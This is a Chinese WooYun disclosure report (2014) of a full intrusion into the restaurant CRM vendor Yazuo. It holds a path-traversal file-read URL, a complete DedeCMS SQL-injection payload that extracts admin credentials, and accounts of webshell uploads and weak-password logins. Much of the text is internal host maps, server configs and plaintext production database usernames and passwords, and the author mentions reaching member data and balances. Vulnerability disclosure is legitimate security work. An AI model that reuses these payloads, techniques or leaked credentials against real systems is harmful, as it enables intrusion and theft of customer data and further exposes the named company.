当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-062555

漏洞标题:从一个二维码到雅座全线数据

相关厂商:雅座

漏洞作者: s0mun5

提交时间:2014-05-28 15:07

修复时间:2014-07-12 15:08

公开时间:2014-07-12 15:08

漏洞类型:成功的入侵事件

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-05-28: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-07-12: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

雅座,成立于2006年4月,是国内餐饮行业最大的CRM服务提供商。总部位于北京,已在全国50个城市设立了办事处。同时,在无锡iPark软件园建设了国内最大的餐饮数据储备中心,产品研发中心,客服中心和面向餐饮业提供专业管理培训的雅座商学院。
前两天出去吃饭走到一家新辣道门前服务员非得拉我扫二维码加会员,碍于不好拒绝就扫了一下,然后就有了这次的洞。

详细说明:

关注以后在微信里的会员页面如下
没有检测ua 在pc的浏览器上也可以打开

IMG_3436.PNG


商家logo那里有任意文件读取
先收集信息备用
http://58.83.233.44/yazuo-weixin/weixin/phonePage/getImage.do?brandId=1119&name=../../../../../../etc/passwd
eth0

# Xen Virtual Ethernet
DEVICE=eth0
BOOTPROTO=none
ONBOOT=yes
HWADDR=2e:97:34:fd:02:b0
NETMASK=255.255.255.0
IPADDR=192.168.50.60
GATEWAY=192.168.50.254
TYPE=Ethernet


hosts

# Do not remove the following line, or various programs
# that require network functionality will fail.
127.0.0.1       localhost.localdomain localhost
::1		localhost6.localdomain6 localhost6
#192.168.50.30      crmdb.yazuoyw.com
#192.168.50.60   WMSTradeServer
#192.168.56.40   www.backup.com
#192.168.49.50   tradedb.yazuoyw1.com
#192.168.50.50   crmdb.yazuoyw1.com
#192.168.49.30   tradedb.yazuoyw.com
#192.168.50.100     possys.yazuoyw.com
192.168.50.60   WMSTradeServer
192.168.49.30   tradedb.yazuoyw.com
192.168.49.55   bak.tradedb.yazuoyw.com
192.168.50.30   crmdb.yazuoyw.com
192.168.50.55   bak.crmdb.yazuoyw.com
192.168.49.210  crmapi.yazuoyw.com
192.168.49.210  possys.yazuoyw.com
192.168.49.210  webservice.yazuoyw.com
192.168.49.210  mq.yazuoyw.com
192.168.59.10   gp.yazuoyw.com
192.168.50.160  memcache1.yazuoyw.com
192.168.50.165  memcache2.yazuoyw.com
192.168.49.70   miralcedb.yazuoyw.com


扫描c断 大致确定是58.83.233.30-70
http://crm.yazuo.com/ 雅座crm 核心系统
http://58.83.233.61/index.htm 合同管理
http://58.83.233.57/index.html 销售管理
http://58.83.233.56/ ERP
http://www.yazuo.com/ 主站
http://58.83.233.44/yazuo-weixin/weixin/ 这个是在各个店里为微信扫码用的接口

漏洞证明:

先说比较重要的问题
主站是dedecms的 存在注入

http://www.yazuo.com/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@`\%27`%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`%20limit+0,1),5,6,7,8,9%23@`\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294


文档的名称是:|nnwhko|4057d57572f1303b1bef
网址是:http://127.0.0.1:819=3


后台刚刚好就是这个用户名
http://www.yazuo.com/nnwhko/login.php?gotopage=%2Fnnwhko%2F
破解密码成功进入后台getshell

11111.PNG


CRM系统无法注册,只能猜密码
凭借多年的人品 18888888888 密码123456 成功进入
刚好还是个管理员 太赞了

2222.PNG


功能相当强大 可以管理会员各种信息 充值余额 发送短信等等等等
当然充值余额这个是最实用的
看看这一个连锁店的业绩 啧啧啧(后面进入ERP后发现有三四百家店 俏江南啊 呷哺呷哺啊 新辣道啊 什么很多知名的都有)

4444.PNG


创建营销上传图片的地方成功gelshell

333333.PNG


<VirtualHost *:80>
    DocumentRoot "/yazuo_apps/crm35/current/public/"
    ServerName crm.yazuo.com
    CustomLog "|cronolog /var/log/httpd/crm.yazuo.com/access_log.%Y%m%d " combined
    ErrorLog "|cronolog /var/log/httpd/crm.yazuo.com/error_log.%Y%m%d "
        <Directory "/yazuo_apps/crm35">
                Options FollowSymLinks
                AllowOverride all
                Order allow,deny
                Allow from all
        </Directory>
</VirtualHost>
#图片服务器
<VirtualHost *:80>
    DocumentRoot "/yazuo_apps/crm35/current/data/upload/"
    ServerName static.yazuo.com
    CustomLog "|cronolog /var/log/httpd/static.yazuo.com/access_log.%Y%m%d " combined
    ErrorLog "|cronolog /var/log/httpd/static.yazuo.com/error_log.%Y%m%d "
        <Directory "/yazuo_apps/crm35">
                Options FollowSymLinks
                AllowOverride all
                Order allow,deny
                Allow from all
        </Directory>
</VirtualHost>
#微信crm
<VirtualHost *:80>
    DocumentRoot "/yazuo_apps/weixin_crm/current/public/"
    ServerName weixincrm.yazuo.com
    CustomLog "|cronolog /var/log/httpd/weixin_crm/access_log.%Y%m%d " combined
    ErrorLog "|cronolog /var/log/httpd/weixin_crm/error_log.%Y%m%d "
        <Directory "/yazuo_apps/weixin_crm">
                Options FollowSymLinks
                AllowOverride all
                Order allow,deny
                Allow from all
        </Directory>
</VirtualHost>
#微信crm演示
<VirtualHost *:80>
    DocumentRoot "/yazuo_apps/weixin_crm_test/current/public/"
    ServerName 58.83.233.45
    CustomLog "|cronolog /var/log/httpd/weixin_crm_test/access_log.%Y%m%d " combined
    ErrorLog "|cronolog /var/log/httpd/weixin_crm_test/error_log.%Y%m%d "
        <Directory "/yazuo_apps/weixin_crm_test">
                Options FollowSymLinks
                AllowOverride all
                Order allow,deny
                Allow from all
        </Directory>
</VirtualHost>
<VirtualHost *:80>
    DocumentRoot "/yazuo_apps/yazuoapi"
    ServerName space.yazuosoft.com
    CustomLog "|cronolog /var/log/httpd/space.yazuosoft.com/access_log.%Y%m%d " combined
    ErrorLog "|cronolog /var/log/httpd/space.yazuosoft.com/error_log.%Y%m%d "
        <Directory "/yazuo_apps/yazuoapi">
                Options FollowSymLinks
                AllowOverride all
                Order allow,deny
                Allow from all
        </Directory>
</VirtualHost>
#memcached管理工具
<Directory "/yazuo_apps/memadmin">
	Options FollowSymLinks
	AllowOverride all
	Order allow,deny
	Allow from all
</Directory>
<VirtualHost *:80>
    DocumentRoot "/yazuo_apps/memadmin/"
    ServerName memadmin.yazuo.com
</VirtualHost>


配置文件太炫酷了 各种库的参数

db' => 
    array (
      'adapter' => 'PDO_PGSQL',
      'params' => 
      array (
        'host' => 'crmdb.yazuoyw.com',
        'port' => '5432',
        'username' => 'dev',
        'password' => 'devASDFZXCV',
        'dbname' => 'crm',
      ),
    ),
    'multidb' => 
    array (
      'db1' => 
      array (
        'adapter' => 'PDO_PGSQL',
        'host' => 'crmdb.yazuoyw.com',
        'port' => '5432',
        'username' => 'dev',
        'password' => 'devASDFZXCV',
        'dbname' => 'crm',
        'default' => '1',
      ),
      'db2' => 
      array (
        'adapter' => 'PDO_PGSQL',
        'host' => 'crmdb.yazuoyw.com',
        'port' => '5432',
        'username' => 'dev',
        'password' => 'devASDFZXCV',
        'dbname' => 'crm',
      ),
      'dbmsg' => 
      array (
        'adapter' => 'PDO_PGSQL',
        'host' => 'crmdb.yazuoyw.com',
        'port' => '5432',
        'username' => 'dev',
        'password' => 'devASDFZXCV',
        'dbname' => 'shortmessage',
      ),
      'dbtrade' => 
      array (
        'adapter' => 'PDO_PGSQL',
        'host' => 'tradedb.yazuoyw.com',
        'port' => '5432',
        'username' => 'oper',
        'password' => 'oper#EDC$RFV',
        'dbname' => 'trade',
      ),
      'dbweixin' => 
      array (
        'adapter' => 'PDO_PGSQL',
        'host' => 'crmdb.yazuoyw.com',
        'port' => '5432',
        'username' => 'weixin',
        'password' => 'weixinASDFZXCV',
        'dbname' => 'crm',
      ),
      'db70' => 
      array (
        'adapter' => 'PDO_PGSQL',
        'host' => 'crmdb.yazuoyw.com',
        'port' => '5432',
        'username' => 'trace',
        'password' => 'tracecrm',
        'dbname' => 'crm',
      ),
      'dbgp' => 
      array (
        'adapter' => 'PDO_PGSQL',
        'host' => 'gp.yazuoyw.com',
        'port' => '5432',
        'username' => 'dev',
        'password' => 'devASDFZXCV',
        'dbname' => 'crm',
      ),
      'dbweibo' => 
      array (
        'adapter' => 'PDO_PGSQL',
        'host' => 'gp.yazuoyw.com',
        'port' => '5432',
        'username' => 'weibo',
        'password' => 'weibogp',
        'dbname' => 'weibo_product',
      ),
      'dberp' => 
      array (
        'adapter' => 'PDO_PGSQL',
        'host' => '192.168.49.100',
        'port' => '5432',
        'username' => 'erp',
        'password' => 'erp',
        'dbname' => 'erp',
      ),
array (
        'email' => '[email protected]',
        'name' => '雅座CRM标准版',
      ),
      'defaultReplyTo' => 
      array (
        'email' => '[email protected]',
        'name' => '宋利新',
      ),
      'marketingReplyList' => 
      array (
        0 => 
        array (
          'email' => '[email protected]',   (wooyun联系厂商的话 可以试试这个email)
          'name' => '宋利新',
        ),
        1 => 
        array (
          'email' => '[email protected]',
          'name' => '营销组',
        ),
      ),


剩下的不用说了 成功在weixin库里找到了自己的注册信息 当然还有余额之类的
数据量没有具体看 应该不少
下一个
http://58.83.233.57/index.html test/test弱口令成功进入 木有测试是否能getshell因为数据库已经拿到了
ERP啊之类的站的库在上面也能找到
管理员手机号1360130xxxx 也登陆成功

修复方案:

提醒一句 crm大部分用户的密码都是某个弱口令 这样不太好

版权声明:转载请注明来源 s0mun5@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)